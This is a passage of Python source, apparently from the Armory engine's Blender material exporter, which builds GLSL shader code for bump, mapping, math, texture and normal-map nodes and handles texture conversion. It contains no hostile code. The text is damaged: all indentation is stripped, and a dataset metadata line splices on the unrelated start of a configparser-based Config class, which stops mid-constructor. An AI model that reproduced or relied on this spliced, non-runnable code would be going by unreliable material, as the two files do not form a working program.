sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass through
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
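# parse_vector_input and parse_value_input are symmetric coercion helpers:
# a linked VALUE result "foo_res" is promoted to "vec3(foo_res)" by
# parse_vector_input, while a linked RGB/VECTOR result "bar_res" is demoted
# to "bar_res.x" by parse_value_input; unlinked sockets fall back to the
# socket default value (or a per-material uniform when batching is active).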
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
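# Illustrative sketch of the GLSL emitted for a two-point curve named "c0"
# evaluated on "v.x" (identifiers and point values depend on the node):
#   float c0_ys[2]; c0_ys[0] = y0; c0_ys[1] = y1;
#   float c0_fac = v.x;
#   int c0_i = 0 + (c0_fac > x1 ? 1 : 0);
#   float c0_xs[2]; c0_xs[0] = x0; c0_xs[1] = x1;
#   // returned expression:
#   mix(c0_ys[c0_i], c0_ys[c0_i + 1], (c0_fac - c0_xs[c0_i]) * (1.0 / (c0_xs[c0_i + 1] - c0_xs[c0_i])))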
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
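# Illustrative sketch (identifiers depend on the node name) of the code
# emitted for a plain, non-triplanar image texture with a linked UV input:
#   vec4 <node>_store = texture(<tex_name>, vec2(<uv>.x, 1.0 - <uv>.y).xy);
#   <node>_store.rgb = pow(<node>_store.rgb, vec3(2.2)); // only if to_linear
# The store variable is cached in `parsed`, so later reads of the same image
# node reuse the single fetch instead of sampling again.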
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
# Split the generated call into prefix, coordinate and suffix so the
# coordinate can be offset for the extra height samples below
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
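# write_bump turns a procedural call such as "tex_checker_f(co * scale)" into
# prefix "tex_checker_f(", coordinate "co * scale" and suffix ")", then emits
# four extra evaluations at offset coordinates (<node>_store_bump_1.._4).
# The BUMP node branch in parse_vector() later combines those four heights
# into a perturbed normal; texture_store() produces the equivalent samples
# for image textures using textureOffset().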
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found (' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
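# The returned dict describes the texture for the exporter: always 'name' and
# 'file', plus optional sampler hints such as 'min_filter', 'mag_filter',
# 'mipmap_filter', 'generate_mipmaps', 'u_addressing', 'v_addressing' and
# 'source' ('movie'), depending on the image and interpolation settings.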
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
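# e.g. is_pow(256) -> True, is_pow(96) -> False, is_pow(0) -> False;
# a power of two has exactly one bit set, so num & (num - 1) clears it to zero.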
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| 1.671875 | 2 |
src/config.py | Jizanator/botty | 0 | 4994 | import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
def __init__(self, print_warnings: bool = False):
# print_warnings is a workaround: a single Config instance is not threaded
